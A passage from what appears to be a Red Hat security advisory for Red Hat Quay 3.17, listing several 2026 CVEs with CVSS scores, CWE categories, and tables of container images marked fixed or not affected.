Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-34986

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-39892

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-40192

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-40895

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-42033

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
